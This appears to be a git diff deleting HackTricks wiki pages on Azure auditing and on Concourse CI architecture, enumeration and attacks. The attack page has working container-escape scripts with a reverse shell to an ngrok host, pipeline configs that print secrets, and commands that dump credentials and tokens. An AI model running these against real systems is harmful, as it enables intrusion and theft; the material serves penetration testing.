-If the company is not paying for a Standard account you may need to review the **CIS Microsoft Azure Foundations Benchmark** by "hand" (you can get some help using the following tools). Download it from [**here**](https://www.newnettechnologies.com/cis-benchmark.html?keyword=\&gclid=Cj0KCQjwyPbzBRDsARIsAFh15JYSireQtX57C6XF8cfZU3JVjswtaLFJndC3Hv45YraKpLVDgLqEY6IaAhsZEALw\_wcB#microsoft-azure).
-
-## Run scanners
-
-Run the scanners to look for **vulnerabilities** and **compare** the security measures implemented with **CIS**.
-
-```bash
-pip3 install scoutsuite
-scout azure --cli --report-dir <output-dir>
-
-#Fix azureaudit.py before launching cs.py
-#Adding "j_res = {}" on line 1074
-python cs.py -env azure
-
-#Azucar is an Azure security scanner for PowerShell (https://github.com/nccgroup/azucar)
-#Run it from its folder
-.\Azucar.ps1 -AuthMode Interactive -ForceAuth -ExportTo EXCEL
-
-#Azure-CIS-Scanner,CIS scanner for Azure (https://github.com/kbroughton/azure_cis_scanner)
-pip3 install azure-cis-scanner #Install
-azscan #Run, login before with `az login`
-```
-
-## Attack Graph
-
-[**Stormspotter**](https://github.com/Azure/Stormspotter) creates an "attack graph" of the resources in an Azure subscription. It enables red teams and pentesters to visualize the attack surface and pivot opportunities within a tenant, and supercharges your defenders to quickly orient and prioritize incident response work.
-
-## More checks
-
-* Check for a **high number of Global Admins** (between 2 and 4 are recommended). Access it on: [https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/Overview](https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/Overview)
-* Global admins should have MFA activated. Go to Users and click on the Multi-Factor Authentication button.
-
-![](<../.gitbook/assets/image (293).png>)
-
-* Dedicated admin accounts shouldn't have mailboxes (they can only have mailboxes if they have Office 365).
-* Local AD shouldn't be synced with Azure AD if not needed ([https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/AzureADConnect](https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/AzureADConnect)). And if synced, Password Hash Sync should be enabled for reliability. In this case it's disabled:
-
-![](<../.gitbook/assets/image (294).png>)
-
-* **Global Administrators** shouldn't be synced from a local AD. Check if the Global Administrators' emails use the domain **onmicrosoft.com**. If not, check the source of the user; the source should be Azure Active Directory. If it comes from Windows Server AD, report it.
-
-![](<../.gitbook/assets/image (295).png>)
-
-* **Standard tier** is recommended instead of free tier (see the tier being used in _Pricing & Settings_ or in [https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/24](https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/24))
-* **Periodic SQL servers scans**:
-
- _Select the SQL server_ --> _Make sure that 'Advanced data security' is set to 'On'_ --> _Under 'Vulnerability assessment settings', set 'Periodic recurring scans' to 'On', and configure a storage account for storing vulnerability assessment scan results_ --> _Click Save_
-* **Lack of App Services restrictions**: Look for "App Services" in Azure ([https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites](https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites)) and check if any are being used. In that case, go through each App checking for "Access Restrictions"; if there are no rules, report it. The access to the app service should be restricted according to the needs.
-
-# Office365
-
-You need **Global Admin** or at least **Global Admin Reader** (but note that Global Admin Reader is a bit limited). However, those limitations only appear in some PS modules and can be bypassed by accessing the features via the web application.
-
-# AWS
-
-Get objects in graph: [https://github.com/FSecureLABS/awspx](https://github.com/FSecureLABS/awspx)
-
-# GCP
-
-{% content-ref url="gcp-security/" %}
-[gcp-security](gcp-security/)
-{% endcontent-ref %}
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
diff --git a/cloud-security/concourse/README.md b/cloud-security/concourse/README.md
deleted file mode 100644
index 2745687e4..000000000
--- a/cloud-security/concourse/README.md
+++ /dev/null
@@ -1,67 +0,0 @@
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
-**Concourse allows you to build pipelines to automatically run tests, actions and build images whenever you need it (time based, when something happens...)**
-
-# Concourse Architecture
-
-Learn how the concourse environment is structured in:
-
-{% content-ref url="concourse-architecture.md" %}
-[concourse-architecture.md](concourse-architecture.md)
-{% endcontent-ref %}
-
-# Run Concourse Locally
-
-Learn how you can run a concourse environment locally to do your own tests in:
-
-{% content-ref url="concourse-lab-creation.md" %}
-[concourse-lab-creation.md](concourse-lab-creation.md)
-{% endcontent-ref %}
-
-# Enumerate & Attack Concourse
-
-Learn how you can enumerate the concourse environment and abuse it in:
-
-{% content-ref url="concourse-enumeration-and-attacks.md" %}
-[concourse-enumeration-and-attacks.md](concourse-enumeration-and-attacks.md)
-{% endcontent-ref %}
-
-# References
-
-* [https://concourse-ci.org/internals.html#architecture-worker](https://concourse-ci.org/internals.html#architecture-worker)
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
diff --git a/cloud-security/concourse/concourse-architecture.md b/cloud-security/concourse/concourse-architecture.md
deleted file mode 100644
index 09f585ac4..000000000
--- a/cloud-security/concourse/concourse-architecture.md
+++ /dev/null
@@ -1,52 +0,0 @@
-# Concourse Architecture
-
-## Concourse Architecture
-
-
-
-Support HackTricks and get benefits!
-
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-## Architecture
-
-![](<../../.gitbook/assets/image (307) (3) (1).png>)
-
-### ATC: web UI & build scheduler
-
-The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs).
-
-The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continuously check for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes.
-
-### TSA: worker registration & forwarding
-
-The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc).
-
-The TSA by **default listens on port `2222`**, and is usually colocated with the [ATC](https://concourse-ci.org/internals.html#component-atc), sitting behind a load balancer.
-
-The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa).
-
-### Workers
-
-In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim).
-
-* **Garden**: This is the **Container Management API**, usually run on **port 7777** via **HTTP**.
-* **Baggageclaim**: This is the **Volume Management API**, usually run on **port 7788** via **HTTP**.
-
-
-
-Support HackTricks and get benefits!
-
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/cloud-security/concourse/concourse-enumeration-and-attacks.md b/cloud-security/concourse/concourse-enumeration-and-attacks.md
deleted file mode 100644
index 52d1baa21..000000000
--- a/cloud-security/concourse/concourse-enumeration-and-attacks.md
+++ /dev/null
@@ -1,466 +0,0 @@
-# Concourse Enumeration & Attacks
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-## User Roles & Permissions
-
-Concourse comes with five roles:
-
-* _Concourse_ **Admin**: This role is only given to owners of the **main team** (default initial concourse team). Admins can **configure other teams** (e.g.: `fly set-team`, `fly destroy-team`...). The permissions of this role cannot be affected by RBAC.
-* **owner**: Team owners can **modify everything within the team**.
-* **member**: Team members can **read and write** within the **teams assets** but cannot modify the team settings.
-* **pipeline-operator**: Pipeline operators can perform **pipeline operations** such as triggering builds and pinning resources, however they cannot update pipeline configurations.
-* **viewer**: Team viewers have **"read-only" access to a team** and its pipelines.
-
-{% hint style="info" %}
-Moreover, the **permissions of the roles owner, member, pipeline-operator and viewer can be modified** by configuring RBAC (specifying their allowed actions more granularly). Read more about it in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html)
-{% endhint %}
-
-Note that Concourse **groups pipelines inside Teams**. Therefore users belonging to a Team will be able to manage those pipelines and **several Teams** might exist. A user can belong to several Teams and have different permissions inside each of them.
-
-## Vars & Credential Manager
-
-In the YAML configs you can configure values using the syntax `((`_`source-name`_`:`_`secret-path`_`.`_`secret-field`_`))`.\
-The **source-name is optional**, and if omitted, the [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\
-The optional _**secret-field**_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\
-Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`.
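-
-For example, a task `params` block consuming vars might look like this (a sketch; the `vault` source name and paths are assumptions):
-
-```yaml
-params:
-  # cluster-wide credential manager (or static var), default field
-  API_KEY: ((api.key))
-  # named source "vault", secret-path "concourse/main/db", secret-field "password"
-  DB_PASS: ((vault:concourse/main/db.password))
-```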
-
-### Static Vars
-
-Static vars can be specified in **tasks steps**:
-
-```yaml
- - task: unit-1.13
- file: booklit/ci/unit.yml
- vars: {tag: 1.13}
-```
-
-Or using the following `fly` **arguments**:
-
-* `-v` or `--var` `NAME=VALUE` sets the string `VALUE` as the value for the var `NAME`.
-* `-y` or `--yaml-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the var `NAME`.
-* `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars.
-* `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all.
-
-### Credential Management
-
-There are different ways a **Credential Manager can be specified** in a pipeline, read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\
-Moreover, Concourse supports different credential managers:
-
-* [The Vault credential manager](https://concourse-ci.org/vault-credential-manager.html)
-* [The CredHub credential manager](https://concourse-ci.org/credhub-credential-manager.html)
-* [The AWS SSM credential manager](https://concourse-ci.org/aws-ssm-credential-manager.html)
-* [The AWS Secrets Manager credential manager](https://concourse-ci.org/aws-asm-credential-manager.html)
-* [Kubernetes Credential Manager](https://concourse-ci.org/kubernetes-credential-manager.html)
-* [The Conjur credential manager](https://concourse-ci.org/conjur-credential-manager.html)
-* [Caching credentials](https://concourse-ci.org/creds-caching.html)
-* [Redacting credentials](https://concourse-ci.org/creds-redacting.html)
-* [Retrying failed fetches](https://concourse-ci.org/creds-retry-logic.html)
-
-{% hint style="danger" %}
-Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them.
-{% endhint %}
-
-## Concourse Enumeration
-
-In order to enumerate a concourse environment you first need to **gather valid credentials** or to find an **authentication token**, probably in a `.flyrc` config file.
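-
-A `.flyrc` stores one entry per target, including the bearer token, roughly like this (structure is approximate; values are placeholders):
-
-```yaml
-targets:
-  tutorial:
-    api: https://ci.example.com
-    team: main
-    token:
-      type: bearer
-      value: eyJhbGciOi...
-```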
-
-### Login and Current User enum
-
-* To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**:
- * `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]`
-* Get configured **targets**:
- * `fly targets`
-* Get if the configured **target connection** is still **valid**:
-  * `fly -t <target> status`
-* Get the **role** of the user against the indicated target:
-  * `fly -t <target> userinfo`
-
-### Teams & Users
-
-* Get a list of the Teams
-  * `fly -t <target> teams`
-* Get roles inside a team
-  * `fly -t <target> get-team -n <team-name>`
-* Get a list of users
-  * `fly -t <target> active-users`
-
-### Pipelines
-
-* **List** pipelines:
-  * `fly -t <target> pipelines -a`
-* **Get** pipeline yaml (**sensitive information** might be found in the definition):
-  * `fly -t <target> get-pipeline -p <pipeline-name>`
-* Get all pipeline **config declared vars**
-  * `for pipename in $(fly -t <target> pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t <target> get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done`
-* Get all the **pipelines secret names used** (if you can create/modify a job or hijack a container you could exfiltrate them):
-
-```bash
-rm /tmp/secrets.txt;
-for pipename in $(fly -t onelogin pipelines | grep -Ev "^id" | awk '{print $2}'); do
- echo $pipename;
- fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt;
- echo "";
-done
-echo ""
-echo "ALL SECRETS"
-cat /tmp/secrets.txt | sort | uniq
-rm /tmp/secrets.txt
-```
-
-### Containers & Workers
-
-* List **workers**:
-  * `fly -t <target> workers`
-* List **containers**:
-  * `fly -t <target> containers`
-* List **builds** (to see what is running):
-  * `fly -t <target> builds`
-
-## Concourse Attacks
-
-### Credentials Brute-Force
-
-* admin:admin
-* test:test
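-
-A quick sketch to try those defaults with `fly` (the target name and URL are placeholders):
-
-```bash
-for creds in admin:admin test:test; do
-  fly -t test login -c https://ci.example.com -u "${creds%%:*}" -p "${creds##*:}" \
-    && echo "[+] Valid credentials: $creds"
-done
-```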
-
-### Secrets and params enumeration
-
-In the previous section we saw how you can **get all the secret names and vars** used by the pipelines. The **vars might contain sensitive info** and the **secret names will be useful later to try to steal** them.
-
-### Session inside running or recently run container
-
-If you have enough privileges (**member role or more**) you will be able to **list pipelines and roles** and just get a **session inside** the `<pipeline>/<job>` **container** using:
-
-```bash
-fly -t tutorial intercept --job pipeline-name/job-name
-fly -t tutorial intercept # To be presented a prompt with all the options
-```
-
-With these permissions you might be able to:
-
-* **Steal the secrets** inside the **container**
-* Try to **escape** to the node
-* Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible)
-
-### Pipeline Creation/Modification
-
-If you have enough privileges (**member role or more**) you will be able to **create/modify new pipelines.** Check this example:
-
-```yaml
-jobs:
-- name: simple
- plan:
- - task: simple-task
- privileged: true
- config:
- # Tells Concourse which type of worker this task should run on
- platform: linux
- image_resource:
- type: registry-image
- source:
- repository: busybox # images are pulled from docker hub by default
- run:
- path: sh
- args:
- - -cx
- - |
- echo "$SUPER_SECRET"
- sleep 1000
- params:
- SUPER_SECRET: ((super.secret))
-```
-
-With the **modification/creation** of a new pipeline you will be able to:
-
-* **Steal** the **secrets** (via echoing them out or getting inside the container and running `env`)
-* **Escape** to the **node** (by giving you enough privileges - `privileged: true`)
-* Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node)
-* **Delete** created pipeline
-
-### Execute Custom Task
-
-This is similar to the previous method, but instead of modifying/creating a whole new pipeline you can **just execute a custom task** (which will probably be much **stealthier**):
-
-```yaml
-# For more task_config options check https://concourse-ci.org/tasks.html
-platform: linux
-image_resource:
- type: registry-image
- source:
- repository: ubuntu
-run:
- path: sh
- args:
- - -cx
- - |
- env
- sleep 1000
-params:
- SUPER_SECRET: ((super.secret))
-```
-
-```bash
-fly -t tutorial execute --privileged --config task_config.yml
-```
-
-### Escaping to the node from privileged task
-
-In the previous sections we saw how to **execute a privileged task with concourse**. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node's filesystem devices in /dev, so the escape could be more "complex".
-
-In the following PoC we are going to use the release\_agent to escape with some small modifications:
-
-```bash
-# Mounts the memory cgroup controller and creates a child cgroup
-# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist",
-# it's because your setup doesn't have the memory cgroup controller; try changing "memory" to "rdma" to fix it
-mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
-
-# Enables cgroup notifications on release of the "x" cgroup
-echo 1 > /tmp/cgrp/x/notify_on_release
-
-
-# CHANGE ME
-# The host path will look like the following, but you need to change it:
-host_path="/mnt/vda1/hostpath-provisioner/default/concourse-work-dir-concourse-release-worker-0/overlays/ae7df0ca-0b38-4c45-73e2-a9388dcb2028/rootfs"
-
-# The initial path "/mnt/vda1" is probably the same, but you can check it using the mount command:
-#/dev/vda1 on /scratch type ext4 (rw,relatime)
-#/dev/vda1 on /tmp/build/e55deab7 type ext4 (rw,relatime)
-#/dev/vda1 on /etc/hosts type ext4 (rw,relatime)
-#/dev/vda1 on /etc/resolv.conf type ext4 (rw,relatime)
-
-# Then next part I think is constant "hostpath-provisioner/default/"
-
-# For the next part "concourse-work-dir-concourse-release-worker-0" you need to know how it's constructed
-# "concourse-work-dir" is constant
-# "concourse-release" is the concourse prefix of the current concourse env (you need to find it from the API)
-# "worker-0" is the name of the worker the container is running in (will be usually that one or incrementing the number)
-
-# The final part "overlays/bbedb419-c4b2-40c9-67db-41977298d4b3/rootfs" is kind of constant
-# running `mount | grep "on / " | grep -Eo "workdir=([^,]+)"` you will see something like:
-# workdir=/concourse-work-dir/overlays/work/ae7df0ca-0b38-4c45-73e2-a9388dcb2028
-# the UID is the part we are looking for
-
-# Then the host_path is:
-#host_path="/mnt/<device>/hostpath-provisioner/default/concourse-work-dir-<concourse-prefix>-worker-<num>/overlays/<UID>/rootfs"
-
-# Sets release_agent to /path/payload
-echo "$host_path/cmd" > /tmp/cgrp/release_agent
-
-
-#====================================
-#Reverse shell
-echo '#!/bin/bash' > /cmd
-echo "bash -i >& /dev/tcp/0.tcp.ngrok.io/14966 0>&1" >> /cmd
-chmod a+x /cmd
-#====================================
-# Get output
-echo '#!/bin/sh' > /cmd
-echo "ps aux > $host_path/output" >> /cmd
-chmod a+x /cmd
-#====================================
-
-# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
-sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
-
-# Reads the output
-cat /output
-```
-
-{% hint style="warning" %}
-As you might have noticed, this is just a [**regular release\_agent escape**](../../linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/#privileged), simply modifying the path of the cmd in the node
-{% endhint %}
-
-### Escaping to the node from a Worker container
-
-A regular release\_agent escape with a minor modification is enough for this:
-
-```bash
-mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
-
-# Enables cgroup notifications on release of the "x" cgroup
-echo 1 > /tmp/cgrp/x/notify_on_release
-host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab | head -n 1`
-echo "$host_path/cmd" > /tmp/cgrp/release_agent
-
-#====================================
-#Reverse shell
-echo '#!/bin/bash' > /cmd
-echo "bash -i >& /dev/tcp/0.tcp.ngrok.io/14966 0>&1" >> /cmd
-chmod a+x /cmd
-#====================================
-# Get output
-echo '#!/bin/sh' > /cmd
-echo "ps aux > $host_path/output" >> /cmd
-chmod a+x /cmd
-#====================================
-
-# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
-sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
-
-# Reads the output
-cat /output
-```
-
-### Escaping to the node from the Web container
-
-Even if the web container has some defenses disabled it's **not running as a common privileged container** (for example, you **cannot** **mount** and the **capabilities** are very **limited**, so all the easy ways to escape from the container are useless).
-
-However, it stores **local credentials in clear text**:
-
-```bash
-cat /concourse-auth/local-users
-test:test
-
-env | grep -i local_user
-CONCOURSE_MAIN_TEAM_LOCAL_USER=test
-CONCOURSE_ADD_LOCAL_USER=test:test
-```
-
-You could use those credentials to **log in to the web server** and **create a privileged container and escape to the node**.
-
-In the environment you can also find information to **access the postgresql** instance that concourse uses (address, **username**, **password** and database among other info):
-
-```bash
-env | grep -i postg
-CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_ADDR=10.107.191.238
-CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_PORT=5432
-CONCOURSE_RELEASE_POSTGRESQL_SERVICE_PORT_TCP_POSTGRESQL=5432
-CONCOURSE_POSTGRES_USER=concourse
-CONCOURSE_POSTGRES_DATABASE=concourse
-CONCOURSE_POSTGRES_PASSWORD=concourse
-[...]
-
-# Access the postgresql db
-psql -h 10.107.191.238 -U concourse -d concourse
-select * from password; #Find hashed passwords
-select * from access_tokens;
-select * from auth_code;
-select * from client;
-select * from refresh_token;
-select * from teams; #Change the permissions of the users in the teams
-select * from users;
-```
-
-### Abusing Garden Service - Not a real Attack
-
-{% hint style="warning" %}
-These are just some interesting notes about the service but, because it's only listening on localhost, these notes won't present any impact that we haven't already exploited before
-{% endhint %}
-
-By default each concourse worker will be running a [**Garden**](https://github.com/cloudfoundry/garden) service on port 7777. This service is used by the Web master to tell the worker **what it needs to execute** (download the image and run each task). This sounds pretty good for an attacker, but there are some nice protections:
-
-* It's just **exposed locally** (127.0.0.1), and I think that when the worker authenticates against the Web with the special SSH service, a tunnel is created so the web server can **talk to each Garden service** inside each worker.
-* The web server is **monitoring the running containers every few seconds**, and **unexpected** containers are **deleted**. So if you want to **run a custom container** you need to **tamper** with the **communication** between the web server and the garden service.
-
-Concourse workers run with high container privileges:
-
-```
-Container Runtime: docker
-Has Namespaces:
- pid: true
- user: false
-AppArmor Profile: kernel
-Capabilities:
- BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read
-Seccomp: disabled
-```
-
-However, techniques like **mounting** the /dev device of the node or release\_agent **won't work** (as the real device with the filesystem of the node isn't accessible, only a virtual one). We cannot access processes of the node, so escaping to the node without kernel exploits gets complicated.
-
-{% hint style="info" %}
-In the previous section we saw how to escape from a privileged container, so if we can **execute** commands in a **privileged container** created by the **current** **worker**, we could **escape to the node**.
-{% endhint %}
-
-Note that while playing with concourse I noticed that when a new container is spawned to run something, the container's processes are accessible from the worker container, so it's like a container creating a new container inside of it.
-
-#### Getting inside a running privileged container
-
-```bash
-# Get current container
-curl 127.0.0.1:7777/containers
-{"Handles":["ac793559-7f53-4efc-6591-0171a0391e53","c6cae8fc-47ed-4eab-6b2e-f3bbe8880690"]}
-
-# Get container info
-curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/info
-curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties
-
-# Execute a new process inside a container
-# In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53
-wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
- --header='Content-Type:application/json' \
- 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
-
-# OR instead of doing all of that, you could just get into the ns of the process of the privileged container
-nsenter --target 76011 --mount --uts --ipc --net --pid -- sh
-```
-
-#### Creating a new privileged container
-
-You can very easily create a new container (just use a random UID) and execute something in it:
-
-```bash
-curl -X POST http://127.0.0.1:7777/containers \
- -H 'Content-Type: application/json' \
- -d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}'
-
-# Wget will be stuck there as long as the process is being executed
-wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
- --header='Content-Type:application/json' \
- 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
-```
-
